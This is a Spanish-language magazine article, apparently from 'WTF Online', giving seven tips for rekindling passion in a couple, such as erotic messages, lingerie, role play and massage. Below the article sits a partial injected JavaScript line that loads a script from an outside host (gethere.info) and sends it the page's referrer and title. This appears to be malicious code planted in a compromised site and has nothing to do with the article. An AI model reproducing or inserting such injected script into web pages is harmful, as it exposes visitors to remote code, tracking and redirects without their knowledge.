7 Formas de elevar la pasión en tu relación

Por Elizabeth Palacios [email protected]__palacios

En las relaciones de pareja, es importante que no se permita que la temperatura baje a tales formas que la pasión se esfume.

La mejor recomendación para que esto no suceda es que constantemente sorprendas a tu pareja con detalles candentes que los lleven directamente a la cama.

 

En WTF Online te decimos 7 formas de elevar la pasión en tu relación:

Relato erótico

Hazle un relato erótico a tu pareja, incluye en este algunas ideas de lo que te gustaría que hicieran, utiliza frases que suelen usar durante el sexo o para insinuar tener sexo para que la imaginación haga su trabajo y termine en un encuentro candente.

Mensajes sensuales

Envíale mensajes llenos de erotismo a su celular, hazle saber lo mucho que deseas tener sexo con tu pareja, durante el día llénalo de mensajes subidos de tono, háblale sucio y hazlo desear salir corriendo hacia tu casa.

Lista de lugares sexuales

Elabora una lista donde puntualices los lugares donde constantemente tienen sexo, por otro lado, escribe una lista donde sugieras otros lugares donde te encantaría que tengan relaciones sexuales.

Ropa interior especial

Sorprende a tu pareja con lencería sexy o con ropa interior ajustada, dependiendo el caso, utiliza escotes pronunciados o ropa que amolde tu cuerpo, su perfume o loción favorita, que se vea que tienes intenciones perversas.

Roles sensuales

Seguramente tienen alguna película o escena de alguna que les pone candentes, trata de recrear esa escena erótica, modifica el ambiente, vístete como en la escena aunque requieras de disfraces, que todo sea lo más similar posible.

Masaje

El masaje nunca falla, ambientación de luz tenue, lubricantes, velas, aromas especiales y a darle gusto al cuerpo.

Baile erótico

Báilale sensual a tu pareja, haz que se excite tan solo de verte, muéstrale tus mejores pasos de baile y la mejor actitud.

<>

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Comentarios